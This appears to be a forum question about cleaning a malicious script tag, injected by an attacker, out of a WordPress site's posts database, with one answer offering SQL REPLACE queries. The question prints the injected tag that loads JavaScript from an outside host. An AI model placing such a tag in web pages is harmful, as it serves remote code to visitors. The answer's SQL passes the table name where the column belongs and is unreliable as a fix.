# how to remove virus from sql databases of site?

Tags: sql, database, wordpress, virus

yesterday, i got virus on my site, after i removed the malicious code in index.php, i found same code in many posts database of site, I can’t remove code manually from all the posts databases as there are too many, how can i remove them from database?

```
<script type=’text/javascript’ src=’https://js.donatelloflowfirstly.ga/stats.js?n=nb5′></script>
```

Comment: Why can't you do that? Why not write an SQL query to gather all data, and remove it?

Answer (score 0):

Try this

```
UPDATE `table_name` SET column_name = REPLACE (table_name, "<script type=’text/javascript’ src=’https://js.donatelloflowfirstly.ga/stats.js?n=nb5′></script>", " ");
```

In human language, you want to search for a specific table (table_name), set the specific column (column_name) and then replace all instances of the script with an empty string ""

Most of these injections are typically in the wp_posts folder so here's an example.

```
UPDATE `wp_posts` SET post_content = REPLACE (wp_posts, "<script type=’text/javascript’ src=’https://js.donatelloflowfirstly.ga/stats.js?n=nb5′></script>", " ");
```